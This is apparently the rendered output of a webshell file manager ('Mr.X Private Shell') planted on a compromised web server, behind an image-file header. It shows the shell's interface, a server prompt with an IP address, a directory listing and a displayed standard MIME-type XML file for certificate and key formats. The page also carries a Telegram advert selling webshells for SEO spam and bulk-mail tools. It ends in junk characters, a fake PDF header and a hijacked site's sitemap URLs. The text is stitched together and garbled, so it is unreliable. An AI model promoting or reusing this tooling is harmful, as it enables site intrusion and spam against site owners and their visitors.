xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
<?xml version="1.0" encoding="UTF-8"?>
<mime-info xmlns="http://www.freedesktop.org/standards/shared-mime-info">

	<!-- Non standard: Common practice -->
	<mime-type type="application/x-pem-file">
		<comment>Openssl PEM format</comment>
		<acronym>PEM</acronym>
		<sub-class-of type="text/plain"/>
		<glob weight="50" pattern="*.pem"/>
	</mime-type>

	<!--  Defined in: http://www.ietf.org/rfc/rfc2585.txt -->
	<mime-type type="application/pkix-cert">
		<comment>X.509 Certificate</comment>
		<glob weight="75" pattern="*.cer"/>

		<!-- Non standard: Common practice -->
		<glob weight="55" pattern="*.crt"/>
		<glob weight="55" pattern="*.cert"/>

		<!-- Non standard: Common practice -->
		<alias type="application/x-x509-ca-cert"/>
		<alias type="application/x-x509-user-cert"/>
	</mime-type>

	<!-- Non standard: OpenSSL PEM format -->
	<mime-type type="application/pkix-cert+pem">
		<comment>X.509 Certificate in PEM format</comment>
		<sub-class-of type="application/x-pem-file"/>
		<magic priority="75">
			<match type="string" value="-----BEGIN CERTIFICATE-----" offset="0"/>
		</magic>
	</mime-type>

	<!-- Defined in: http://www.ietf.org/rfc/rfc2585.txt -->
	<mime-type type="application/pkix-crl">
		<comment>Certificate Revocation List</comment>
		<acronym>CRL</acronym>
		<expanded-acronym>Certificate Revocation List</expanded-acronym>
		<glob weight="75" pattern="*.crl"/>
	</mime-type>

	<!-- Non standard: OpenSSL PEM format -->
	<mime-type type="application/pkix-crl+pem">
		<comment>Certificate Revocation List in PEM format</comment>
		<sub-class-of type="application/x-pem-file"/>
		<magic priority="75">
			<match type="string" value="-----BEGIN X509 CRL-----" offset="0"/>
		</magic>
	</mime-type>

	<!-- Non standard: Common practice -->
	<mime-type type="application/x-pkcs12">
		<comment>PKCS#12 Personal Key and Certificates</comment>
		<acronym>PKCS#12</acronym>
		<glob weight="75" pattern="*.p12"/>

		<!-- Non standard: Microsoft practice -->
		<glob weight="55" pattern="*.pfx"/>

		<!-- Non standard: Rare practice, unclear this actually got into a spec -->
		<alias type="application/pkcs12"/>
	</mime-type>

	<!-- Non standard: OpenSSL PEM format -->
	<mime-type type="application/pkcs12+pem">
		<comment>PKCS#12 Personal Key and Certificates in PEM format</comment>
		<sub-class-of type="application/x-pem-file"/>
		<magic priority="75">
			<match type="string" value="-----BEGIN PKCS12-----" offset="0"/>
		</magic>
	</mime-type>

	<!-- Defined in: http://www.ietf.org/rfc/rfc5958.txt -->
	<mime-type type="application/pkcs8">
		<comment>PKCS#8 Personal Key</comment>
		<acronym>PKCS#8</acronym>
		<glob weight="75" pattern="*.p8"/>

		<!-- Non standard: Gnome keyring practice -->
		<glob weight="55" pattern="*.pkcs8"/>
	</mime-type>

	<!-- Non standard: OpenSSL PEM format -->
	<mime-type type="application/pkcs8+pem">
		<comment>PKCS#8 Personal Key in PEM format</comment>
		<sub-class-of type="application/x-pem-file"/>
		<magic priority="75">
			<match type="string" value="-----BEGIN PRIVATE KEY-----" offset="0"/>
			<match type="string" value="-----BEGIN ENCRYPTED PRIVATE KEY-----" offset="0"/>
		</magic>
	</mime-type>

	<!-- Defined in: http://www.ietf.org/rfc/rfc2311.txt -->
	<mime-type type="application/pkcs7-mime">
		<comment>PKCS#7 Message and Certificates</comment>
		<acronym>PKCS#7</acronym>
		<glob pattern="*.p7c"/>
		<glob pattern="*.p7m"/>

		<!-- Not standard: Microsoft practice -->
		<glob pattern="*.spc"/>
		<glob pattern="*.p7b"/>

		<!-- Non standard: Microsoft practice -->
		<alias type="application/x-pkcs7-certificates"/>
	</mime-type>

	<!-- Non standard: OpenSSL PEM format -->
	<mime-type type="application/pkcs7-mime+pem">
		<comment>PKCS#7 Message and Certificates in PEM format</comment>
		<sub-class-of type="application/x-pem-file"/>
		<magic priority="75">
			<match type="string" value="-----BEGIN PKCS7-----" offset="0"/>
		</magic>
	</mime-type>

	<!-- Defined in http://www.ietf.org/rfc/rfc2311.txt -->
	<mime-type type="application/pkcs7-signature">
		<comment>PKCS#7 Signature</comment>
		<acronym>PKCS#7</acronym>
		<glob pattern="*.p7s"/>
	</mime-type>

	<!-- Defined in http://www.ietf.org/rfc/rfc2311.txt -->
	<mime-type type="application/pkcs10">
		<comment>PKCS#10 Certificate Request</comment>
		<acronym>PKCS#10</acronym>
		<glob pattern="*.p10"/>
		<glob pattern="*.csr"/>
	</mime-type>

	<!-- Non standard: OpenSSL PEM format -->
	<mime-type type="application/pkcs10+pem">
		<comment>PKCS#10 Certificate Request in PEM format</comment>
		<sub-class-of type="application/x-pem-file"/>
		<magic priority="75">
			<match type="string" value="-----BEGIN CERTIFICATE REQUEST-----" offset="0"/>
			<match type="string" value="-----BEGIN NEW CERTIFICATE REQUEST-----" offset="0"/>
		</magic>
	</mime-type>

	<!-- Non standard: SPKAC DER format -->
	<mime-type type="application/x-spkac">
		<comment>SPKAC Certificate Request</comment>
		<glob pattern="*.spkac"/>
	</mime-type>

	<!-- Non standard: SPKAC DER format -->
	<mime-type type="application/x-spkac+base64">
		<comment>SPKAC Certificate Request in OpenSSL format</comment>
		<sub-class-of type="text/plain"/>
		<magic priority="75">
			<match type="string" value="SPKAC=" offset="0"/>
		</magic>
	</mime-type>

	<!-- Non standard: OpenSSL PEM format -->
	<mime-type type="application/x-pem-key">
		<comment>Private Key in PEM format</comment>
		<sub-class-of type="application/x-pem-file"/>
		<magic priority="75">
			<match type="string" value="-----BEGIN RSA PRIVATE KEY-----" offset="0"/>
			<match type="string" value="-----BEGIN DSA PRIVATE KEY-----" offset="0"/>
			<match type="string" value="-----BEGIN EC PRIVATE KEY-----" offset="0"/>
		</magic>
	</mime-type>
</mime-info>

Filemanager

Name Type Size Permission Actions
freedesktop.org.xml File 2.04 MB 0644
gcr-crypto-types.xml File 5.6 KB 0644
yast2-metapackage-handler-mimetypes.xml File 494 B 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml